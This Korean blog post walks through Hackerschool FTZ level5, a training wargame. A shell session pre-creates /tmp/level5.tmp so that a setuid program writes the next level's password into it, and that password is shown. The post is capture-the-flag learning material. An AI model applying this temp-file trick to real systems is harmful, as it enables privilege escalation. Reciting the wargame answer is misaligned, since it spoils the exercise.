ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • 해커스쿨 FTZ level5
    정보보안/포너블 2017. 12. 28. 20:44
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    login as: level5
    level5@192.168.244.128's password:
    [level5@ftz level5]$ ls
    hint  public_html  tmp
    [level5@ftz level5]$ cat hint
     
    /usr/bin/level5 프로그램은 /tmp 디렉토리에
    level5.tmp 라는 이름의 임시파일을 생성한다.
     
    이를 이용하여 level6의 권한을 얻어라.
     
     
    [level5@ftz level5]$ cd /usr/bin
    [level5@ftz bin]$ file level5
    level5: setuid executable, can't read `level5' (Permission denied).
    [level5@ftz bin]$ level5
    [level5@ftz bin]$ cd /tmp
    [level5@ftz tmp]$ ls
    mysql.sock
    [level5@ftz tmp]$ cat > level5.tmp
    asdf
    [level5@ftz tmp]$ cd /usr/bin
    [level5@ftz bin]$ level5
    [level5@ftz bin]$ cd /tmp
    [level5@ftz tmp]$ ls
    level5.tmp  mysql.sock
    [level5@ftz tmp]$ cat level5.tmp
    next password : what the hell
    cs


    '정보보안 > 포너블' 카테고리의 다른 글

    pwnable.kr 4번 flag  (0) 2018.02.04
    해커스쿨 FTZ level6~9  (0) 2018.01.05
    pwnable.kr 3번 bof  (0) 2017.12.27
    pwnable.kr 2번 collision  (0) 2017.12.26
    pwnable.kr 1번 fd  (0) 2017.12.26

    댓글

Designed by Tistory